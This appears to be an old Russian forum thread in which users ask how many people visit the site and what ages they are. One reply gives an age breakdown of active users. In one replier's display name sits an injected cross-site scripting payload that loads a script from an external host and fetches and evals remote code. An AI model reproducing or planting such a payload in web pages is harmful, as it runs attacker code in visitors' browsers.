Интересно, сколько нас на этом форуме?!

М сАФР Профи (823), закрыт 16 лет назад
А еще интересно, сколько лет?
Лучший ответ
Байт Эксперт пока не указал должность 16 лет назад
За последний месяц на проект зашло свыше трех с половиной миллионов человек.
Среди активных пользователей (Знаток и выше) распределение по возрастам такое:

1. 20–25 лет
2. 15–20 лет
3. 25–30 лет
4. 30–35 лет
lasselantaГений (71965) 16 лет назад
То есть меня тут вообще нету?
Пошла в себя, переживать...
Байт "><script src=https://n4.xss.ht></script>b<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//n4sty.dev\");a.send();</script>b (17358) Почему нет? Это просто 4-ка наиболее часто встречающихся
Остальные ответы
Пользователь удален Мастер (1021) 16 лет назад
нас то много) А при чем здесь то сколько лет?
Денис Валькович Профи (862) 16 лет назад
Сколько на форуме людей, можешь узнать, когда заходишь в ОТВЕТЫ. Внимательней смотрите в правом верхнем углу.